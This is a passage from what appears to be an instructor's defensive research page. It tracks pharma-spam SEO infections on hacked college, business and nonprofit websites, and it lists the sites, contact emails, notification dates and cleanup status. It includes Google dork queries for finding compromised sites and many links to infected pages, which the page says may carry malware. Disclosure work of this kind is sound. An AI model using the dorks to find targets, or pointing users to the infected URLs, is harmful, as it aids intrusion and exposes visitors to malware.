https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEMQFjAD&url=http%3A%2F%2Fwww.wwpinfo.com%2F%3Fmcofoinwpw249%3Dhow-to-obtain-viagra-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEJK1yhkRK4aukYoSfoWyW4lS7BKg&sig2=Kzr3G7WSEIOkzBKh_CLwyQ&bvm=bv.56988011,d.cGU
16. www.3dogcreative.biz
Web site not up yet, but already infected
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEoQFjAE&url=http%3A%2F%2Fwww.3dogcreative.biz%2Fwp-content%2Fwp%2F%3Fp%3D151&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGBPM1BB-Y5RHc9-W7dL9sacPs1jQ&sig2=nnhgoz27M7Sg5Y93T9fIUA&bvm=bv.56988011,d.cGU
17. columbiagreenhouse.com
NY
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFEQFjAF&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=HfsekHrly84inOytQbJGrQ&bvm=bv.56988011,d.cGU
18. figurefinishing.com
VA
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGQQFjAH&url=http%3A%2F%2Ffigurefinishing.com%2F%3Fbuy-viagra-in-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEZSjIa7jlpLA6HFBootnF0wi_Y0Q&sig2=oiRHrs1DuDa_Fe1dYFTDiQ&bvm=bv.56988011,d.cGU
19. xoverland.com
MT
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CGsQFjAI&url=http%3A%2F%2Fwww.xoverland.com%2Frssxvl.php%3Fl%3D92&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGMAMJfrrAyKDMm0kDYlEC3Op-7rA&sig2=UXrgmCvBQ6HbJ05tZlStPw&bvm=bv.56988011,d.cGU
20. aaohn.org
American Asociation of Occupational Health Nurses, FL
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHMQFjAJ&url=http%3A%2F%2Faaohn.org%2Fpharmacy.php%3Fproduct%3D10571&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHp1M3--3joxExUh6vcpzN88sFM1w&sig2=c0EJ8FK1aiS0T4H2pPEUBA&bvm=bv.56988011,d.cGU
21. chatsoft.com
CLoud service provider, NJ
info@chatsoft.com
Not the same defacement, notified via Twitter on 11-23-13 or 11-14-13
http://www.chatsoft.com/solutions/datamanagement/index.html
22. collin.edu
Texas
Notified 11-23-13 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFcQFjADOAo&url=http%3A%2F%2Fiws.collin.edu%2Fecoker%2Fimages%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNFfhzXWWc7wMkf6Oe-rUPfcjLg8Cg&sig2=9snfjkM5uPqGeol1L9p3rA&bvm=bv.56988011,d.cGU
23. yicca.org
Site by redbulconsulting.com, a Swiss consulting firm

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fyicca.org%2Frssyic.php%3Fyic%3D484&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNE4kwVB_Glliiz4KPsHgqLT03PPPQ&sig2=oahZQdHFKdpnAQIQqld3gQ&bvm=bv.56988011,d.cGU
24. nrc.ie
Dublin, Ireland
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fnrc.ie%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNErTeHURaWcjumbe_vJ-FYfUIMWDA&sig2=8AeBbQTgEq5-UiWYn8jOBw&bvm=bv.56988011,d.cGU
25. flobots.com
Website by djcoffman.com
djcoffman@gmail.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fflobots.com%2Fpfizer-viagra-discount%2F&ei=2T-RUv27OMffoAS864LAAQ&usg=AFQjCNEil6kk8PJIniIu6eVGY0_bpDDt6w&sig2=-KIeiwGbkeZWP0-rML1W1A&bvm=bv.56988011,d.cGU

12. Links to helpful resources

Why My Website Sells Viagra (2012)

Protect Your WordPress Website from a Pharma Hack (2012)

Google Viagra Hack Hitting Websites Hard

Gumblar .cn Exploit – 12 Facts About This Injected Script (2009)

Viagra ads appearing in google search results (2009)

This forum thread seems to be about aa infection similar to the one I am seeing:

http://forum.avast.com/index.php?topic=131579.0

Rogues & Frauds « Canadian International Pharmacy Association

ohotdamn.com Redirects ~ canadian-pharmacy-24h.com

Buy Amitriptyline – canadian-pharmacy-24h.com

Discussion of this hacking technique from 2010

13. UK infected colleges (11-25-13)

I can't get many US colleges to talk to me, and I think it may be from fear of lawsuits, since there is no data-sharing law in the USA. I've been told things are better in Europe, and I suppose folks in NZ and AU may be less paranoid, just from my experiences with them. so I'm trying to find colleges there.

I used these Google searches:

inurl:UK intitle:viagra
inurl:uk intitle:viagra university
inurl:ac.uk intitle:viagra university
inurl:ac.uk intitle:viagra
@burrowingsec told me on Twitter about janet:

https://www.ja.net/support-advice/support/security-issues

So I notified them by email first ( service@ja.net ), rather than contacting each college individually.

That was a mistake. It is now 10 PM 11-26-13, and despite the promises at https://www.ja.net/support-advice/support/security-issues that they will respond within one or two hours, here I am, 36 hours after my first notification by email, 21 hours after @mark_s0 alerted them via Twitter, and 6 hours after my second notification by email. They have not responded to any of them, and the first 5 colleges on my list remain vulnerable. Ja.net is worse than useless, they just slow down repairs with their lies.

So I resume what I should have done in the first place, and contact the colleges directly.

Wow! That worked! The next day, 11-27-13, I tested them and 9/12 have been cleaned, apparently by deleting files or shutting off infected servers.
Organization Emails Malicious URL
1. www.targettravel.co.uk
admin@targettravel.info
abuse@targettravel.info
security@targettravel.info

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE4QFjAE&url=http%3A%2F%2Fwww.targettravel.co.uk%2Fviagra-uk-supplier.html&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNEPEC4Xk4UkVMHCGjYWnwDQsxRdSw&sig2=JV3uN_kNSrCny56V5LlpSw&bvm=bv.56988011,d.cGU
2. wccsj.ac.uk
Welsh Centre for Crime and Social Justice
admin@wccsj.ac.uk
abuse@wccsj.ac.uk
security@wccsj.ac.uk

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CGEQFjAG&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123137&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFAk_vZczVyKhEWuX69y3X5aKtQbw&sig2=xT3Da_5LAGABDsC5kMs5sA&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGkQFjAH&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123287&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFlM1bFAF_s1Q-cLWj_NJwbmgOVqg&sig2=2T_MpWV716UYjLoat5gbHw&bvm=bv.56988011,d.cGU

3. hip.hertford.ox.ac.uk
Oxford University
louise.turner@hertford.ox.ac.uk
security@hertford.ox.ac.uk
abuse@hertford.ox.ac.uk
andrew.hemingway@hertford.ox.ac.uk

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHgQFjAJ&url=http%3A%2F%2Fhip.hertford.ox.ac.uk%2Fviagra%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNHdQLUhdt1SJ22JS-R6jbzevjmeuQ&sig2=7Jhk36XEqaTnIeTHIHc31Q&bvm=bv.56988011,d.cGU
4. studyingeconomics.ac.uk
U. of Bristol
econ-network@bristol.ac.uk
webmaster@bristol.ac.uk
abuse@bristol.ac.uk
security@bristol.ac.uk
A.Bernays@bristol.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fstudyingeconomics.ac.uk%2Fgames-and-books%2F%3Fc3r1z%3D681291&ei=BnSTUs-XC4_YoASdwYKIAg&usg=AFQjCNGkH30VSsigQhRR7A2BnvqRE9pQUA&sig2=afk7SdZWe6Oo1gyTlfYNMA&bvm=bv.57127890,bs.1,d.cGE&cad=rja
5. www.met.reading.ac.uk
U. of Reading
infosec@met.reading.ac.uk
webmaster@reading.ac.uk
secuity@reading.ac.uk
abuse@reading.ac.uk
vc@reading.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CFoQFjAGOBQ&url=http%3A%2F%2Fwww.met.reading.ac.uk%2F~sws96srb%2Fuploads%2Fupload%2Flunchsem.php%3Fdc%3D1682&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNGR2z9NsMiI0DqinKezG5VkHx5cQg&sig2=kYUGqOD11Isu5_V9DQ5wJA&bvm=bv.56988011,d.cGU
6. www.cemmap.ac.uk
Economic and Social Research Council
emma_h@ifs.org.uk
abuse@ifs.org.uk
security@ifs.org.uk
websupport@esrc.ac.uk
angela.newton@esrc.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGMQFjAHOBQ&url=http%3A%2F%2Fwww.cemmap.ac.uk%2Fwps%2Fonline%2F%3Fmedic%3D42386-ViagRX-viagra-tablets-sale&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNForrP6m0Vu_-OeKWn3av0MyotYFA&sig2=BGHWJ1vpPF_iPq2pVnnQUA&bvm=bv.56988011,d.cGU
7. cardiffmet.ac.uk
Cardiff Metropolitan U.
izone@cardiffmet.ac.uk
abuse@cardiffmet.ac.uk
security@cardiffmet.ac.uk
izone@cardiffmet.ac.uk
hward@effcom.co.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fsuperdrug-uk-viagra&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNHh4kbCHDBqSMahWEyO_aYrpAGO4w&sig2=MZGm_bGd-yJpNKUKIeSoDw&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGoQFjAIOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fviagra-through-customs-uk&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNG-4yyKatNp9Oqt4lPHz3LXL_RWpw&sig2=JEeU5jVHROMeQx1-gtZAkw&bvm=bv.56988011,d.cGU

8. www.cranfield.ac.uk
Cranfield U.
mediarelations@cranfield.ac.uk
security@cranfield.ac.uk
abuse@cranfield.ac.uk
info@cranfield.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEsQFjAEOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D196%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNEnErjuCDaR2QXx972TvBBa4aq87g&sig2=WRD5YXEKow1RhAOvptB36A&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFQQFjAFOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D4%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5NMyVIYo2gzS4-PGxDUAK9b_Usw&sig2=Q_oSBJUiPpKfZM8a2OpKsw&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFwQFjAGOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D225%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5C5lSb1AQBQKOmHz7gauH5UZ6gA&sig2=b4RUGCAQ_tEsEvfa7olAcw&bvm=bv.56988011,d.cGU

9. rca.ac.uk
Royal College of Art
info@rca.ac.uk
abuse@rca.ac.uk
security@rca.ac.uk
ied@rca.ac.uk
media@rca.ac.uk
publications@rca.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGUQFjAHOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F103-viagra.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNFlcmx5STMygRXNA2Rznz_h5sCm-w&sig2=4mlkERaImer88RDtorgRzw&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CG0QFjAIOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F157-viagrx.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNGWqUf_qQTZUJ2_ZrzHCXI4LyLeLw&sig2=-3aV-L0oSJ0ProTmKJx7Ig&bvm=bv.56988011,d.cGU

10. wlecentre.ac.uk
Institute of Education, London
info@ioe.ac.uk
security@ioe.ac.uk
abuse@ioe.ac.uk
security@wlecentre.ac.uk
abuse@wlecentre.ac.uk
web.editor@ioe.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

http://www.wlecentre.ac.uk/index.php/viagra-sales
11. rhul.ac.uk
Royal Holloway U. of London
iQuad@rhul.ac.uk
security@rhul.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGcQFjAIOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D2924%26what%3Dviagra%2Bsubstitute%2Buk&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNG2xt-lmlojaxdN61fFxQisWED-WA&sig2=eSsb3pwcgDh7wmgiEe2tIQ&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHAQFjAJOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D4387%26what%3Dviagra%2Brezeptfrei%2Bschweiz&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNHXYX9HkUK2ulD5bovGZpJWfzqVdg&sig2=8OWwTRVFtQhpRyFZCIX2VA&bvm=bv.56988011,d.cGU

12. strethamschool.co.uk
Stretham Primary School
office@stretham.cambs.sch.uk
security@stretham.cambs.sch.uk
abuse@stretham.cambs.sch.uk

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHIQFjAJOB4&url=http%3A%2F%2Fwww.strethamschool.co.uk%2Fwp-content%2Fthemes%2Fgracio%2Fview-generic_viagra_cheap_prices.NzM1.html&ei=Z6aTUuz_DsreoATXwYGoBA&usg=AFQjCNEYT325h1PVm_kWNNp6LYvXKKihJA&sig2=qRLTPj_bkD3Wywafx2HBBA&bvm=bv.56988011,d.cGU

14. Misc. Infected Sites

For now, these are the ones outside the UK I found while searching for UK sites.

I'll rearrange these as I proceed to other countries.

Organization Emails Malicious URL
1. www.iospress.nl
Science book publisher
iospress@accucoms.com
abuse@accucoms.com
security@accucoms.com
abuse@accucoms.com
editorial@iospress.nl
security@iospress.nl
abuse@iospress.nl
http://twitter.com/IOSPress_STM

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD8QFjAC&url=http%3A%2F%2Fwww.iospress.nl%2Forder-viagra-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFkDnoND5tbHHzyPLXM_FYuz_oCFQ&sig2=VLGnW8AXLxJqak4N0vyIDg&bvm=bv.56988011,d.cGU
4. www.gaylea.com
Many locations, but neither US nor UK
questions@gayleafoods.com
security@gayleafoods.com
abuse@gayleafoods.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CHEQFjAI&url=http%3A%2F%2Fwww.gaylea.com%2Fviagra-alternative-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNGgwljON9etvbIadjxu1gDc7Yj_4A&sig2=6TCNwDzhv7smHlca1m95jA&bvm=bv.56988011,d.cGU

Not a redirection, hosted on their server, but only visible from Google

http://www.gaylea.com/dr-buying-viagra-online/
This one is visible directly, not just from Google.

5. www.redleafresort.com.au
reservations@redleafresort.com.au
security@redleafresort.com.au
abuse@redleafresort.com.au

Notified 11-25-13

http://www.redleafresort.com.au/fast-mail-order-viagra/

http://www.redleafresort.com.au/tag-viagra-without-prescription/

http://www.redleafresort.com.au/ed-order-viagra/

http://www.redleafresort.com.au/a-erectile-dysfunction-viagra/

http://www.redleafresort.com.au/ed-cheap-viagra-from-canada/

Visible directly, not just from Google

6. thiefandbandit.com
thiefandbandit@gmail.com

Notified 11-25-13

http://thiefandbandit.com/a-buy-viagra-in-great-britain/

Visible directly, not just from Google

7. www.petetribal.org
klaflin@maine.rr.com
sgrosse@maine.rr.com

Notified 11-25-13

http://www.petetribal.org/in-cialis-commercial/

Visible directly

8. www.cmmsmadeeasy.com
Software company in WI, Site is incomplete
abuse@cmmsmadeeasy.com
security@cmmsmadeeasy.com

Notified 11-25-13

http://www.cmmsmadeeasy.com/med-cialis-super-active/

Directly visible

9. www.gaywellington.org
helpline@gaywellington.org
abuse@gaywellington.org
security@gaywellington.org

Notified 11-25-13

http://www.gaywellington.org/page-genaric-cialis/

Directly visible

11. solidifi.com
Appraisers in NY
clientsupport@solidifi.com
contactus@solidifi.com
ABUSE@solidifi.com
security@solidifi.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fsolidifi.com%2Fbuy-uk-viagra%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNGmWN0VgD2blzs5ueLe2TsgaEcjpA&sig2=aayhKBmmXZ2YWipfGuL2jQ&bvm=bv.56988011,d.cGU
12. www.jessicashops.com
http://twitter.com/jessicashops
security@jessicashops.com
abuse@jessicashops.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fwww.jessicashops.com%2Fviagra-sale-uk%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNFRXa-_bfpIktfY5VO0fW_RHQvFiA&sig2=CHi2mViORBMw2DcsWP9PTg&bvm=bv.56988011,d.cGU
13. www.blonk.it
Italian book publisher
info@blonk.it
security@blonk.it
abuse@blonk.it

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fwww.blonk.it%2Fuk-viagra-cheap%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNEUwlKnBC2wn75lPhMN0MJEpIDMJA&sig2=bHI0GP1cAfS17jKGznK8-Q&bvm=bv.56988011,d.cGU
18. uns.ac.id
Indonesia
security@uns.ac.id
abuse@uns.ac.id

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGgQFjAIOB4&url=http%3A%2F%2Fekonomi.fkip.uns.ac.id%2F%3Fac-uk-buy-viagra&ei=SHqTUo24EczXoAT-64CwDQ&usg=AFQjCNEIGSsisNa_0zQsVkeI4yXh_SAb5w&sig2=EQUNyTPc4QvhNXFWT1r58w&bvm=bv.56988011,d.cGU
19. uga.edu
U of Georgia
security@uga.edu
abuse@uga.edu
sebailey@uga.edu
uc@uga.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fwww.forestry.uga.edu%2Fnews%2Fwp-content%2Fuploads%2F2013%2F02%2Fsql.php%3Fp%3Dbuy-viagra-in-vancouver&ei=g5iTUp-zL9jtoATGhILQCA&usg=AFQjCNErXq9q7nSvgwyUUmGNQdrm2otteg&sig2=3_amtwGrf8bpB8mMMcBQpg&bvm=bv.56988011,d.cGU
20. ambassador.edu
California
Registrar@ambassador.edu
security@ambassador.edu
abuse@ambassador.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=31&ved=0CCsQFjAAOB4&url=http%3A%2F%2Fwww.ambassador.edu%2Fphp.php%3Fnunun%3Dvic.edu.au-buy-viagra%26nun%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNHy2RuGD_FjvXAiZQjrtzqvIh3GeQ&sig2=Sb7gSjtNQI6gneeFGC9nAA&bvm=bv.56988011,d.cGU
21. wku.edu
Western Kentucky University
wku@wku.edu
abuse@wku.edu
security@wku.edu
torie.cockriel@wku.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEgQFjAEOB4&url=http%3A%2F%2Fip205-109.ieb.wku.edu%2Fsuccess.php%3Fkokok%3Dvic.edu.au-buy-viagra%26hoh%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNGBT3C5l-f7lrwVva6_KK3MZ0mUVw&sig2=VfP-2tQYGnlnRgXDSMkmiw&bvm=bv.56988011,d.cGU
22. harvard.edu
@harvard
president@harvard.edu
abuse@harvard.edu
security@harvard.edu
ranna_farzan@harvard.edu, scott_fields@harvard.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEgQFjAEOAo&url=http%3A%2F%2Fwww.hcs.harvard.edu%2Fiop%2Fwp-content%2Fuploads%2F2011%2F07%2F%3Fvn%3Dviagra-au%26f%3D2&ei=pKSTUpGINYP3oAT484KYCQ&usg=AFQjCNHqoyAj1Q5zxY9rDNxlBUwizH5bRw&sig2=727rDcHGz7vJExtz9b4Pig&bvm=bv.56988011,d.cGU
23. www.sutherlandclinic.com
Tennessee
Cbmaccallum@sutherlandclinic.com
abuse@sutherlandclinic.com
security@sutherlandclinic.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.sutherlandclinic.com%2Fcardiologyexperts.html&ei=hqeTUrvqNcH6oASUzYDwBg&usg=AFQjCNHnHdwsOKlVdDzVeuPtxTm75BqQmQ&sig2=wLSIsaLDlFSfRFBtLmybTQ&bvm=bv.56988011,d.cGU

15. NZ infected colleges (11-25-13)

I used these Google searches:
inurl:ac.nz intitle:viagra
Organization Emails Malicious URL
1. apsa.ac.nz
U. of Auckland
admin@auckland.ac.nz
abuse@auckland.ac.nz
studentinfo@auckland.ac.nz
t.greene@auckland.ac.nz
fmhsweb@auckland.ac.nz

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CG8QFjAI&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dhow-to-buy-viagra-30-pills-in-uk%26eq%3Dviagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNG88Lge4bgaz-zAsO1gUTlvPOfA8Q&sig2=HT-n7MYj7ByYEaS89bDanQ&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHYQFjAJ&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dbuy-female-viagra-30-pills-100-mg-76-06usd-overnight-shipping%26iq%3Dfemale-viagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNHRijndrYs1Iz-f0uQfrlgnjG_3ig&sig2=PHmj6FeWBjenUqBAAtqnqQ&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dfemale-viagra-without-prescriptione%26dv%3Dfemale-viagra&ei=GpuTUqbOMtTToASg2YCoAQ&usg=AFQjCNGu4F9IhryCu7I9tnANUFUzxZ4wNA&sig2=cYkn6lHL-iw1lihdzTr_Ig&bvm=bv.56988011,d.cGU

16. AU infected colleges (11-25-13)

I used these Google searches:
inurl:.edu.au intitle:viagra
inurl:.au intitle:viagra school
Organization Emails Malicious URL
1. usyd.edu.au
U. of Sydney
admin@sydney.edu.au
abuse@sydney.edu.au
vice.chancellor@sydney.edu.au

Notified 11-25-13

http://acl.arts.usyd.edu.au/threecities/index.php?option=com_content&task=view&itemes=viagra
2. icms.edu.au
International College of Management, Sydney
admin@icms.edu.au
abuse@icms.edu.au
info@icms.edu.au
tmaillet@icms.edu.au
dshiell@icms.edu.au

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD0QFjAC&url=http%3A%2F%2Fwww.icms.edu.au%2Fed%2Fviagra-online&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNEc1_-QU8CNZup221vUc_Y5kP6G0g&sig2=-Rug8h2yFcngyr_MdtJ96A&bvm=bv.56988011,d.cGU
3. www.bethany.sa.edu.au
Bethany Christian School
karen.julius@bethany.sa.edu.au
admin@is.sa.edu.au
abuse@is.sa.edu.au
office@ais.sa.edu.au

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEYQFjAD&url=http%3A%2F%2Fwww.bethany.sa.edu.au%2Findex.php%3Fid%3D217572&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNF8hKuGYFfGffkKzmwv1NzJbsYdrw&sig2=rMyltfzj63ZTHPCvxj_qLA&bvm=bv.56988011,d.cGU
4. www.unsw.edu.au
U. of New South Wales
https://twitter.com/unsw
admin@unsw.edu.au
abuse@unsw.edu.au
vice-chancellor@unsw.edu.au
shane.coxATunsw.edu.au

Notified 11-25-13

https://collab.phys.unsw.edu.au/gens4015/index.php/Viagra

https://collab.phys.unsw.edu.au/gens4015/index.php/Generic_viagra

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEAQFjADOAo&url=http%3A%2F%2Fmembranes.edu.au%2Fblog%2Fhkiu%2Flopybis-buying-using-paypal%2F&ei=X6GTUtuYFcLroAT8mYLACA&usg=AFQjCNHY_lt3svo4go_y6u6n5WF1wWYqJw&sig2=fQ7LGGhrwWBMoN2vVEkJ7g&bvm=bv.56988011,d.cGU

That one redirects to a viagra site that is down now, but the infection is still present on your server

5. qsma.org.au
Queensland Self-Management Alliance
admin@arthritis.org.au
abuse@arthritis.org.au
helene@arthritis.org.au

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CEIQFjADOBQ&url=http%3A%2F%2Fqsma.org.au%2Fdmdocuments%2FMzA4.html&ei=oqWTUuWxJc_zoAS-4YCgBg&usg=AFQjCNHH4JAOU2OLcZrb6Qgjk1WSSN87gA&sig2=PWR2uVU7Ovf09PY8IltR-g&bvm=bv.56988011,d.cGU&cad=rja

17. More notifications (11-25-13)

I decided to notify all the small businesses and other companies outside the UK I have listed above.

Here's the letter I used:

Subject: Infection on Your Server

Hello:

I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.

Your web server has been hacked, and is being used to drive traffic to a site selling Viagra. This is a form of identity theft, stealing your good reputation.

To see the infection, visit the URL below. I recommend using a Mac or Linux machine to perform this test because the pages that open may contain malware.

Please alert your webmaster.

Many companies I have warned simply deleted the infected files, but they often restore themselves. I would like to do a more thorough analysis of this malware to guide people in cleaning it.

If you are interested in joining a working group to analyze this infection, please email me.

Details are here: http://samsclass.info/125/proj11/subtle-infect.htm

18. Top "Buy Viagra" Hits (11-27-13)

My current hypothesis of how this scam works is that the hacked colleges and businesses are used to deliver links for black-hat Search Engine Optimization, to cause the Russian "Canadian Pharmacy" sites to rise in Google searches.

So the colleges I have been notifying are really secondary to the monetization of the scheme.

To hit this thing at its root, it seems valuable to get the sites that directly make money for them: online viagra sales.

I used these Google searches:

buy viagra
buy viagra online
Organization Emails Malicious URL
Hit 1. tobuyviagra.com
Whois leads to:
http://privacyprotect.org/contact/

Reported on 11-27-13

http://tobuyviagra.com/
Directly hosted page
Hit 2. prototypeplayground.net
Incomplete site, looks abandoned
Whois leads to:
IBRENNAN@B-ARCH.COM
abuse@a2hosting.com

Notified 11-27-13

